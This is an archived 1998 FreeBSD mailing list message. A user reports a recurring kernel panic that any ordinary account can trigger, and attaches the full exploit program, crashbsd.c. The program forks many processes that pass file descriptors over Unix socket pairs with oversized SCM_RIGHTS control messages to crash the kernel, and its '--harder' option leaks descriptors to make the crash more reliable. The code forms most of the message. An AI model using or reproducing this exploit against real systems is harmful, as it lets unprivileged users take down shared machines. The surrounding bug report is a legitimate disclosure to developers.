Date: Tue, 11 Aug 1998 00:31:03 -0700 (PDT) From: Scott <scott@SchematiX.net> To: FreeBSD-stable@FreeBSD.ORG Subject: Huge Bug in FreeBSD not fixed? Message-ID: <Pine.BSF.4.02.9808110025020.216-200000@SchematiX.net>
next in thread | raw e-mail | index | archive | help
[-- Attachment #1 --]
I ran across this bug a while back on rootshell, and then again by a user
on IRC who offered to take down my box. Soon after that, the bug was fixed
and things were fine. But just out of boredom, i decided to run the
exploit again. Sure enough, i had a kernel panic and that was it. All of
this from a normal user account. The bug has reoccured recently and may
cause problems on my server if the users find out about the vulnerability.
I am running FreeBSD 2.2.7-STABLE (Last compiled on August 5th early in
the morning). The system is running on a PII233 with 64MB RAM. This bug
REALLY needs to be fixed ASAP.
I would like to know if other systes are vulnerable as well. I discussed
this matter on IRC and everyone said they had similar problems. This bug
needs to be addressed soon. I would HATE switching to linux because my
system keeps crashing.
---------------
Scott Swindells, SchematiX.NET
[-- Attachment #2 --]
/* crashbsd.c
**
** THIS PROGRAM CAUSES KERNEL PANIC ON SOME SYSTEMS
**
** Usage: crashme [--harder]
**
** --harder option causes this program to leave opened file descriptors hanging
** thus increasing the probability of the crash.
**
*/
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/un.h>
#include <sys/uio.h>
#include <sys/socket.h>
#include <sys/wait.h>
int main(int argc,char **argv) {
int harder=0,p,nproc,h,i,socketfds[2];
char a[10];
struct iovec iov1={a,1};
struct cmsghdr *cm;
struct msghdr msg;
char bbuffer[sizeof(struct cmsghdr)+sizeof(int)*24];
if(argc>=2&&!strcmp(argv[1],"--harder")) harder=1;
nproc=-1;
for(i=0;i<100;i++){
if(!(p=fork())){
if(socketpair(AF_UNIX,SOCK_STREAM,0,socketfds)){
perror("socketpair");
}else{
cm=(struct cmsghdr*)bbuffer;
cm->cmsg_level=SOL_SOCKET;
cm->cmsg_type=SCM_RIGHTS;
cm->cmsg_len=sizeof(struct cmsghdr)+sizeof(int);
msg.msg_name=(caddr_t)0;
msg.msg_namelen=0;
msg.msg_flags=0;
msg.msg_iov=&iov1;
msg.msg_iovlen=1;
msg.msg_control=(caddr_t)cm;
msg.msg_controllen=cm->cmsg_len;
if(fork()){
close(socketfds[0]);
*(int*)(bbuffer+sizeof(struct cmsghdr))=open("/dev/null",O_RDONLY);
for(i=0;i<2048;i++){
fprintf(stderr,"%d> ",i+1);
while(sendmsg(socketfds[1],&msg,0)!=1){
if(errno!=EAGAIN){
perror("\nsendmsg");
}
}
}
}else{
close(socketfds[1]);
for(i=0;i<2048;i++){
*(int*)(bbuffer+sizeof(struct cmsghdr))=-1;
fprintf(stderr,">%d ",i+1);
cm=(struct cmsghdr*)bbuffer;
cm->cmsg_level=SOL_SOCKET;
cm->cmsg_type=SCM_RIGHTS;
cm->cmsg_len=sizeof(struct cmsghdr)+sizeof(int)*24;
msg.msg_name=(caddr_t)0;
msg.msg_namelen=0;
iov1.iov_len=10;
msg.msg_iov=&iov1;
msg.msg_iovlen=1;
msg.msg_control=(caddr_t)cm;
msg.msg_controllen=cm->cmsg_len;
if(recvmsg(socketfds[0],&msg,0)!=1){
perror("\nrecvmsg");
}else{
fprintf(stderr,"(%d) ",*(int*)(bbuffer+sizeof(struct cmsghdr)));
if(!harder){
close(*(int*)(bbuffer+sizeof(struct cmsghdr)));
}
}
}
exit(0);
}
wait(&h);
}
exit(0);
}else{
if(p<0){
nproc=i;
i=100;
}
}
}
if(nproc<0) nproc=100;
for(i=0;i<nproc;i++) wait(&h);
fprintf(stderr,"\n%d processes finished\n",nproc);
return 0;
}
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.02.9808110025020.216-200000>